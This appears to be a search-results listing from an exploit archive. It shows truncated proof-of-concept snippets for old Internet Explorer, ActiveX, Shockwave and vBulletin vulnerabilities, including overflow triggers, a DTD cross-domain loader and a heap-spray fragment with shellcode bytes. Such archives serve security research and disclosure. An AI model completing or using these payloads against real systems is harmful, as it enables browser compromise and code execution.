83 matches found
Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069)
Microsoft XML Core Services DTD - Cross-Domain Scripting MS08-069 KB955218 - CVE-2008-4029 - JA var dom = new ActiveXObject"Msxml2.DOMDocument.3.0"; dom.async = false; var url = "http://www.milw0rm.com/forfun.dtd"; var xml = ""; if dom.loadXMLxml == 0 alert"Blue or Red Pill? " +...
Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069
Exploit for unknown platform in category remote exploits =================================================================== Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069 =================================================================== KB955218 - CVE-2008-4029 - JA var do...
vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit
No description provided by source. / ----------------------------- Author = Mx Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm Software = vBulletin Addon = Visitor Messages Version = 3.7.3 Attack = XSS/XSRF - Description = A critical vulnerability exists in the new vBulletin 3.7.3 softwa...
Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting
!-- Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability Author: Aviv Raff http://aviv.raffon.net/ Summary Internet Explorer is prone to a Cross-Zone Scripting vulnerability in its “Print Table of Links” feature. This feature allows users to add to a printed web page an...
ourgame-overflow.txt
...
Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow
milw0rm.com 2008-02-19...
MS Internet Explorer 6 (Internet.HHCtrl) Heap Overflow Vulnerability
No description provided by source. !-- http://browserfun.blogspot.com/ The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because ...
dxmsft-overflow.txt
There are multiple stack overflows in dxmsft.dll version 6.3.2900.3199 (Image DirectX Transforms). This DLL exposes DirectX Image Transform objects which are safe for scripting. The issue is with the Color property of certain objects, so I am assuming this property is inherited from a base interface...
[Full-disclosure] ComponentOne FlexGrid 7.1 Light Multiple Stack Overflows
The ComponentOne FlexGrid 7.1 VSFlexGrid.VSFlexGridL has multiple stack overflows. I have not tested code execution nor do I remember what this component was installed with. PoC as follows: -------------------- !-- written by e.b. -- html head script language="JavaScript" DEFER function Check var...
flexgrid-overflow.txt
The ComponentOne FlexGrid 7.1 VSFlexGrid.VSFlexGridL has multiple stack overflows. I have not tested code execution nor do I remember what this component was installed with. PoC as follows: -------------------- function Check var s = "AAAA"; while s.length -------------------- Elazar...
[Full-disclosure] WebEx GPCContainer Memory Access Violation
There is a memory access violation in the InitParam and SetParam functions. PoC as follows: --------------------- !-- Written by e.b. -- html head script language="JavaScript" DEFER function Check var obj = new ActiveXObject"GpcContainer.GpcContainer.1"; obj.InitOaram"A"; /script /head body...
[Full-disclosure] Adobe Shockwave ShockwaveVersion() Stack Overflow
There is a stack overflow in ShockwaveVersion function. I have not been able to execute code via this overflow. PoC is as follows: ----------------------- html head script language="JavaScript" DEFER function Check var s = "AAAA"; while s.length 768 768 s=s+s; var obj = new...
Adobe Shockwave ShockwaveVersion() Stack Overflow PoC
No description provided by source. html head script language="JavaScript" DEFER function Check var s = "AAAA"; while s.length 768 768 s=s+s; var obj = new ActiveXObject"SWCtl.SWCtl"; //233C1507-6A77-46A4-9443-F871F945D258 obj.ShockwaveVersions; /script...
Adobe Shockwave ShockwaveVersion() Stack Overflow PoC
Exploit for unknown platform in category dos / poc ===================================================== Adobe Shockwave ShockwaveVersion Stack Overflow PoC ===================================================== function Check var s = "AAAA"; while s.length 0day.today 2018-01-10...
Adobe Shockwave - ShockwaveVersion() Stack Overflow (PoC)
Adobe Shockwave - ShockwaveVersion Stack Overflow PoC function Check var s = "AAAA"; while s.length milw0rm.com 2007-11-08...
AskJeeves Toolbar 4.0.2.53 activex Remote Buffer Overflow Exploit
No description provided by source. html SCRIPT language="javascript" // This is new technique I invent call 'heap fill attack' var str0ke = 0x0d0d0d0d; var sucks = unescape // Launch the system calculator 100 times because what else?...
askjeeves-overflow.txt
// This is new technique I invent call 'heap fill attack' var str0ke = 0x0d0d0d0d; var sucks = unescape // Launch the system calculator 100 times because what else? // This code currently not work on Solaris/Sparc "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +...
[Full-disclosure] MS07-042 XMLDOM substringData() PoC
This bit of JavaScript kills IE 6 on Windows 2000 and Windows XP SP2 var xmlDoc = new ActiveXObject"Microsoft.XMLDOM"; xmlDoc.loadXML"dummy/dummy"; var txt = xmlDoc.createTextNode"huh"; var out = txt.substringData1,0x7fffffff; Installing the patch from MS07-042 fixes it. Cheers, Alla Bezroutchko...
MOAB-03-01-2007.rb.txt
!/usr/bin/ruby c 2006 LMH Original scripting and POC by Aviv Raff http://aviv.raffon.net. Description: Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the fake FTP server required. HTTP server port can be modified but it's not recommended. Adjust as...
MS Internet Explorer (ADODB Execute) Denial of Service PoC
No description provided by source. !-- // Internet Explorer 'ADODB.Connection' object 'Execute' Function Vulnerability POC // tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed // Author: YAG KOHHA skyhole at gmail.com // Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic,...